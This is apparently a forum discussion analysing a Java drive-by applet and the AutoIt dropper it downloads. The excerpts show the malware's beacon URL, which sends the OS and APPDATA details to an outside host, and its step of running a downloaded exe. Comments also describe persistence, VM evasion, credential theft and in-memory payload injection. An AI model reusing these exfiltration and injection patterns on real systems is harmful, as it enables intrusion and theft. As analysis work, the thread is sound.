[Pezmc]

It sends log messages to http://www.galaxyjdb.com with your OS information and the state of the app..

    /insert.php?o=*os.name*&u=*APPDATA*&ip=java.io.tmpdir&e=*APPSTATE*

It appears to download an exe from http://g2f.nl/0lczsoo

Then it tries to execute the exe:

    System.getenv("APPDATA") + "\\AdobeUpdate-Setup1.84.exe";

If at any point in the process it hits an exception, it sends the code for that exception to the galaxy web address, presumably so the dev can see how the app is performing.

Now normally it wouldn't be able to execute the exe (no access to the filesystem), but it looks like the applet requests elevated permissions from the user to allow it to access/run files.

[TazeTSchnitzel]

Ooh, galaxyjdb has a register page: http://www.galaxyjdb.com/index.php?a=Register

>Paypal E-Mail:

>Hackforums Profile Link:

That means this is a service for script kiddies, they've sold this exploit as a service.

EDIT: Hackforums is basically a public internet forum where people openly discuss "hacking" and sell "hacking" tools. I've seen another example, a DDOS service, with an almost empty homepage but login and register actions.

(Why someone would be stupid enough to sell their product from the same domain it reports back to is beyond me, though. Especially since they put credits on it.)

EDIT 2: BINGO! http://www.hackforums.net/showthread.php?tid=3262851&hig... (the forum thread where the product is sold!)

Galaxy JDB is sort for "Galaxy Java Drive-By", apparently.

EDIT 3: Product image here, for people without hackforums accounts: http://i5.minus.com/iq2n2GtUjGHpW.png

Oh wow. "Noob friendly". "Free hosting". "Website Cloner". Only $40 for 6 months...

[JonnieCache]

What did you redact there?

[obilgic]

Probably author removed the feature and was lazy about the design

[TazeTSchnitzel]

Yeah, it's not my redaction.

[DanBC]

AVG detects this as Luhe.Fiha.A

Here's a mnetion from 2011:

(http://answers.microsoft.com/en-us/windows/forum/windows_7-s...)

So, someone using an OS heavily targeted by malware decides not to use anti-malware software, and to have javascript and apparently java enabled in the browser, and then chooses to visit an URL advertised in a chat window - that URL is unknown to that person, does not match the URL they're on but claims a link to the URL they're on, etc etc.

It's a shame someone got robbed, and the responsibility is clearly on the criminal to not engage in criminal behaviour.

But come on; don't just give them your money.

EDIT: I just read the first answer to the MS post above. It's baffling.

> On reflection the best and easiest recourse might be to just tell AVG to "ignore" this "infection." Is this thing actually a virus? or an infection? I have seen no operational problems, nothing in chkdsk, sfc, Registry Mechanic, etc., to concern me.

Totally unrelated to MtGox but: someone has anti-malware software. That software tells them it's found an infected file. There's no evidence this is a false positive. Rather than wipe and re-install (a distressingly unpopular choice) or using anti-malware tools to clean the infection the advice is to train the software to ignore the infection.

MS is stuffed. There is nothing they can do to repair their malware reputation when the users are that stupid.

[tallanvor]

This isn't just an MS problem. Macs have the problem where users still believe their OS isn't vulnerable to malware and as such aren't careful either.

[maxerickson]

I think they are trying to call it a false positive. They happen from time to time.

I wouldn't try to convince someone else they had a false positive without positively identifying the files in question though.

[gcb0]

The saying goes, never attribute to malice what can be explained by stupidity.

But they also say, just because you're paranoid it doesn't mean they aren't after you.

So I'd say this may very well be the authors of the malware astroturfing and trying to fool others into ignoring it

[bri3d]

The EXE is an AutoIt3 script (they didn't even scrub the AutoIt version from the PE metadata).

You can run the AutoIt3 script through Exe2Aut (an AutoIt decompiler) and you'll find a pretty mundane remote access toolkit which inserts itself into \Run, checks to see if it's running in a variety of virtualized environments, and, if it's not, can start one of a couple different remote control payloads. It looks like it's got a rudimentary Facebook credentials theft mechanism in its first stage as well.

This is a pretty common for-sale driveby script kiddie exploit - it's depressing how effective these still are.

[revelation]

The exe it downloads seems to be a compiled AutoIt3 script.

Here it is cleaned up: http://pastebin.com/raw.php?i=neP9qXGM

Seems like yet another dropper, not the actual bad thing.

[socillion]

Apart from some basic functions like replication (including a message in facebook posts/messages, copying to accessible network drives and usbs), avoiding VMs, and setting itself to run on startup, it looks like most of the work is handed off to 2 payloads embedded in the compiled autoit file. There are also 2 other binaries mentioned (net2 and net4) but I'm not sure what the purpose is right now.

Payload 1: binary image that is in the shell() function.

Payload 2: between "\\carbons\\" and "//J_Y//" in original exe. It is encrypted with RC2, the password is in an INI which should be elsewhere in the exe - the script refers to @ScriptFullPath->"crypted"->"key" where crypted is the INI section name and key is the key name.

Both payloads are converted to DLL format in-memory, then Payload 1 is executed in the context of another window using CallWindowProcW, passing a pointer to Payload 2 to it.

Decompiled version of Payload 1 (embedded hex): http://pastebin.com/kxT9NskV

There is an area of null bytes at 0x1c...0x53. I deleted 1 byte, 0x00, from it so that the beginning 'call 0x54' lines up with an instruction. Not sure if that is correct.

If anyone gets a chance I'd appreciate a copy of the original AutoIt binary package (email in profile.)

[upthedale]

The mention of net2 and net4 sounds like the .Net runtime could be involved - the numbers referring to the version of the runtime. Quite the coincidence if not.

Perhaps a .Net decompiler could help. Reflector used to be the only good tool around, but since it became a paid tool, other free ones have sprung up. dotPeek is one (no idea how good it is).

[jefffoster]

This is "a variant of Win32/Injector.Autoit.HG" trojan according to the ESET antivirus on my machine.